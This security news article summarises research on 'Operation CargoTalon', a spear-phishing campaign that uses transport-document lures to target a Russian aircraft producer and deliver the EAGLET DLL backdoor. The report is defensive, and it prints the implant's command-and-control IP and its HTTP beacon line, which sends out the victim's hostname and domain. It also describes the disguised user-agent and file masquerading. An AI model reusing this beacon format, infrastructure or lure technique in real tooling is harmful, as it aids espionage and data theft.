Operation CargoTalon Attacking Russian Aerospace & Defense to Deploy EAGLET Implant

A sophisticated cyber espionage campaign dubbed “Operation CargoTalon” has emerged, specifically targeting Russia’s aerospace and defense sectors through carefully crafted spear-phishing attacks.

The operation, which surfaced in late June 2025, employs a multi-stage infection chain designed to deploy the EAGLET implant, a custom-built DLL backdoor capable of remote command execution and data exfiltration.

The campaign primarily focuses on employees of the Voronezh Aircraft Production Association (VASO), one of Russia’s major aircraft production entities.

Threat actors behind this operation leverage Transport Consignment Note (TTN) documents, which are critical to Russian logistics operations, as lures to deceive targets into executing malicious payloads.

The attack methodology demonstrates a deep understanding of Russian industrial operations and document workflows.

Seqrite analysts identified the campaign on June 27, 2025, when hunting for malicious spear-phishing attachments on threat intelligence platforms.

The researchers discovered that the threat actor, tracked as UNG0901, employs a sophisticated multi-stage attack vector that begins with malicious email files and progresses through LNK file execution to ultimately deploy the EAGLET implant.

The initial infection vector involves a malicious email file named “backup-message-10.2.2.20_9045-800282.eml” that contains an attachment masquerading as a ZIP file.

This attachment, named “ТранспортнаянакладнаяТТН№391-44от_26.06.2025.zip” (Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip), is actually a malicious DLL file designed to evade detection through file type masquerading.

EAGLET’s Communication Protocol

The EAGLET implant demonstrates sophisticated command and control capabilities through its HTTP-based communication protocol.

Upon execution, the malware establishes persistence by creating a directory called “MicrosoftApppStore” under command and control server located at 185.225.17.104.

The implant utilizes Windows networking APIs, specifically WinHttpOpen and WinHttpConnect, to establish HTTP sessions while masquerading under the user-agent string “MicrosoftAppStore/2001.0”.

This choice of user-agent appears designed to blend with legitimate Microsoft Store traffic, potentially evading network monitoring solutions that might overlook seemingly benign application store communications.

The malware’s initial beacon follows a structured format that exfiltrates basic system information:-

GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1
Host: 185.225.17.104

This communication protocol enables the EAGLET implant to support three primary functions: remote shell access for executing arbitrary commands, file download capabilities for staging additional payloads, and automatic exfiltration of command results through HTTP POST requests to the “/result” endpoint.

The implant’s infrastructure analysis reveals connections to the Head Mare threat group, suggesting possible resource sharing or operational overlap between these advanced persistent threat actors.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now